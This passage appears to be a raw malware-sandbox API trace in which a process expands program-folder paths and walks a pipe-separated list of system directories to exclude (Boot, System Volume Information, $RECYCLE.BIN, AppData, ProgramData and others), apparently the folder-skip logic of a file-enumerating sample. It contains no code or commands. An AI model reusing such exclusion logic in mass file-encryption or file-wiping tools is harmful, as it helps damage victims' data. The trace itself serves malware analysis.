nSize=0x11 | out: lpDst="C:\\Program Files") returned 0x11 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d5530*=0x43, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5530 | out: hHeap=0x6b0000) returned 1 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] StrChrW (lpStart="C:\\Program Files (x86)", wMatch=0x7c) returned 0x0 [0181.655] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x17 [0181.655] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2e) returned 0x6d5170 [0181.655] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)", lpDst=0x6d5170, nSize=0x17 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d5170*=0x43, cb=0x2c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5170 | out: hHeap=0x6b0000) returned 1 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] StrChrW (lpStart="bin|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.655] lstrlenW (lpString="bin") returned 3 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d46d0*=0x62, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] StrChrW (lpStart="Boot|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.655] lstrlenW (lpString="Boot") returned 4 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d46d8*=0x42, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.655] StrChrW (lpStart="boot|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.655] lstrlenW (lpString="boot") returned 4 [0181.655] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d46e2*=0x62, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] StrChrW (lpStart="dev|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.656] lstrlenW (lpString="dev") returned 3 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d46ec*=0x64, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] StrChrW (lpStart="etc|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.656] lstrlenW (lpString="etc") returned 3 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.656] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d46f4*=0x65, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] StrChrW (lpStart="lib|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.657] lstrlenW (lpString="lib") returned 3 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d46fc*=0x6c, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] StrChrW (lpStart="initdr|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.657] lstrlenW (lpString="initdr") returned 6 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4704*=0x69, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] StrChrW (lpStart="sbin|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.657] lstrlenW (lpString="sbin") returned 4 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4712*=0x73, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] StrChrW (lpStart="sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.657] lstrlenW (lpString="sys") returned 3 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.657] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d471c*=0x73, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] StrChrW (lpStart="vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.658] lstrlenW (lpString="vmlinuz") returned 7 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4724*=0x76, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] StrChrW (lpStart="run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.658] lstrlenW (lpString="run") returned 3 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4734*=0x72, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] StrChrW (lpStart="var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.658] lstrlenW (lpString="var") returned 3 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d473c*=0x76, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.658] StrChrW (lpStart="\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.658] lstrlenW (lpString="\\Boot") returned 5 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4744*=0x5c, cb=0xa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] StrChrW (lpStart="System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.659] lstrlenW (lpString="System Volume Information") returned 25 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4750*=0x53, cb=0x32, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] StrChrW (lpStart="$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.659] lstrlenW (lpString="$RECYCLE.BIN") returned 12 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4784*=0x24, cb=0x18, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] StrChrW (lpStart="WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.659] lstrlenW (lpString="WebCache") returned 8 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d479e*=0x57, cb=0x10, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.659] StrChrW (lpStart="Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0181.660] lstrlenW (lpString="Caches") returned 6 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d47b0*=0x43, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] StrChrW (lpStart="WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|AppData|ProgramData|\\Users\\All Users" [0181.660] lstrlenW (lpString="WindowsApps") returned 11 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d47be*=0x57, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] StrChrW (lpStart="AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|ProgramData|\\Users\\All Users" [0181.660] lstrlenW (lpString="AppData") returned 7 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d47d6*=0x41, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.660] StrChrW (lpStart="ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Users\\All Users" [0181.660] lstrlenW (lpString="ProgramData") returned 11 [0181.660] ISequentialStream:RemoteWrite (in: 